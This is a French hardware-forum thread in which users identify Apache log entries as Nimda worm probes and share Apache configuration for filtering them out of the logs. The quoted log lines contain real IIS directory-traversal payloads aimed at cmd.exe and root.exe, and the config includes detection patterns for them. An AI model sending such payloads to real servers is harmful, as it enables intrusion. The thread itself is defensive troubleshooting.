Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2606 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs

  truc zarb dans mon log d'acces apache

 
 


Dernière réponse
Sujet : truc zarb dans mon log d'acces apache
superX j'achete ;)

Votre réponse
Nom d'utilisateur    Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !
Le ton de votre message                        
                       
Votre réponse
[b][i][u][strike][spoiler][fixed][cpp][url][email][img][*]   
 
   [quote]
 
Options

 
Vous avez perdu votre mot de passe ?


Vue Rapide de la discussion
superX j'achete ;)
netswitch je veins de fair une recherche sur nimda, j'ai trouvé d'autres trucs qui ont l'air moins restrictifs :  
 
http.conf :
SetEnvIf Request_URL "\.ida" virus
CustomLog /dev/null common env=virus
CustomLog /web/apache/logs/access_log common env=!virus
 
ou encore :  
 
le log d'accès :
Le but est d'empêcher le log de tout tentative d'accès par nimda.
ajoutez
SetEnvIf Request_URI \cmd.exe|\root.exe nimda
(c'est bien URI et non pas URL !)
modifiez
Customlog /../../access_log common env=!nimda
 
 
le log d'erreur :
Le but est d'empêcher le log d'erreur 404 créé par nimda.
Ajoutez dans le  
<IfModule mod_alias.c>
 RedirectMatch (.*)\root.exe$ http://NimdaIsNotForMe.invalid$1
 RedirectMatch (.*)\cmd.exe$ http://NimdaIsNotForMe.invalid$1
</IfModule>
 
 
 
trucs venant de marcp et de etheral
superX en fait tu definis une regexp dans le SetEnvIf .  Probleme de ma regexp , tous les exe , meme ceux dl depuis mon web sont bourrés dans ce fichier poubelle
superX tu définis une variable : nolog  (tu pourrais aussi l'appeler choux fleur)
 
ensuite les logs seront répartis en fonction de l'URI traité.  
 
je met tous les exe dans un fichier à part ainsi que b.cgi , un truc bizarre que j'ai eu il y a qq jours.
 
avant je mettais aussi les gif , css et compagnie quand j'avais un web , car ca pollue gravement les logs ca aussi
netswitch les 2 premières lignes, je pige
les 3 dernières, je suis pas contre un ou 2 mots d'explication
superX SetEnvIf Request_URI "\.exe$" nolog
SetEnvIf Request_URI "b\.cgi" nolog
CustomLog /web/apache/logs/access_log combined env=!nolog
CustomLog /web/apache/logs/referer_log referer env=!nolog
CustomLog /web/apache/logs/attack.access_log common env=nolog
netswitch ok, merci de l'info, je crée de suite un virtual host bidon pour se prendre toutes ces crasses !
 
246tNt Au fait quand tu utilise les virtual host, le premier ( ou le dernier me rapelle plus ) que tu defini ca vas être le "catch all" cad que c'est celui qui vas servir pour tout les host dont l'ip correspond a ta machine mais sans etre repris par les autre virtual host ( et donc aussi pour ceux qui accede via l'ip, sans host )
netswitch mmh merda, c déja sur un virtual host... (d'ailleurs, c le log de ce virtual host)
 
246tNt Yep les virtual host c pas mal ;)
Je choppe toute ces saloperies dans mon domaine pas defaut ( au fait, une page qui dit que le site n'existe pas ;) ). Et aussi ca protege contre les scripts kiddies. Parce que la plus part de ceux ci prenne une ip et pas de nom de domaine donc genre les scripts qui sont capable de planter ton apache parce que une de tes pages est en php, marche pas vu que y a pas de php sur le catch all.
kadreg Attendu qu'il attaque par l'addresse IP, isi on utilise un virtual host, on arrive à séparer les deux. Les gents qui accèdent au site par le nom vont dans un log, ceux par l'IP dans un autre.
netswitch haba vi masi non, le coup du port, c pas bon, ça doit etre ouvert comme il faut..
 
a moins que l'on puisse mettre dans le dns une correspondance du style:  
www.machine.com => 168.168.255.25:81
 
c donc pas une tentative d'attaque ?
ces trucs apparaissent chaque fois qu'un gars infecté visite le site ?
djoh

netswitch a écrit a écrit :

bhen pour le momment non mais a la rentrée, je dois accueullir des trucs un peu plus chauds...
 
comment je securise contre ce type de conneries / pollution ?
 
je peux m'addresser au proivider contre le joe ?
 
 




 
non,tu verras avec le temps que ça vient de plein d'ip différentes
ça s'est répandu à une vitesse alucinante
y-en a plein partout sur le web maintenant, sur des serveurs ou PC windows de merde sans antivirus à jour ...
la seule solution que j'ai trouvé c'est changé le port découte (vu qu'il attaque uniquement sur le port 80) mais si tu attends du monde à venir dessus c'est p-t pas la meilleur solution : ils vont pas comprendre pk ils réussissent pas à accéder à la page en mettant la bonne url
 
c'est à toi de voir, mais c'est très efficace comme solution
netswitch bhen pour le momment non mais a la rentrée, je dois accueullir des trucs un peu plus chauds...
 
comment je securise contre ce type de conneries / pollution ?
 
je peux m'addresser au proivider contre le joe ?
 
djoh par contre ça te pollue tes log cette connerie, incroyable :ouch:
 
c'est un serveur important ?
djoh nimda attaque  :D  
tu risques rien, il cherche des trus windowsiens  ;)
netswitch hello, j'ai ça dans mon log apache, ça correspond q quoi ?
 
217.136.25.57 - - [10/Aug/2002:16:57:29 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
217.136.25.57 - - [10/Aug/2002:16:57:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290
217.136.25.57 - - [10/Aug/2002:16:57:31 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
217.136.25.57 - - [10/Aug/2002:16:57:32 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
217.136.25.57 - - [10/Aug/2002:16:57:33 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
217.136.45.87 - - [10/Aug/2002:17:21:08 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
217.136.45.87 - - [10/Aug/2002:17:21:09 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290
217.136.45.87 - - [10/Aug/2002:17:21:09 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
217.136.45.87 - - [10/Aug/2002:17:21:09 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
217.136.45.87 - - [10/Aug/2002:17:21:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
217.136.45.87 - - [10/Aug/2002:17:21:09 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
217.136.45.87 - - [10/Aug/2002:17:21:10 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
217.136.45.87 - - [10/Aug/2002:17:21:12 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347
217.136.45.87 - - [10/Aug/2002:17:21:15 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
217.136.45.87 - - [10/Aug/2002:17:21:15 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
217.136.45.87 - - [10/Aug/2002:17:21:15 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
217.136.45.87 - - [10/Aug/2002:17:21:16 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
217.136.45.87 - - [10/Aug/2002:17:21:16 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
217.136.45.87 - - [10/Aug/2002:17:21:16 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
217.136.45.87 - - [10/Aug/2002:17:21:16 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
217.136.45.87 - - [10/Aug/2002:17:21:17 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
 

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)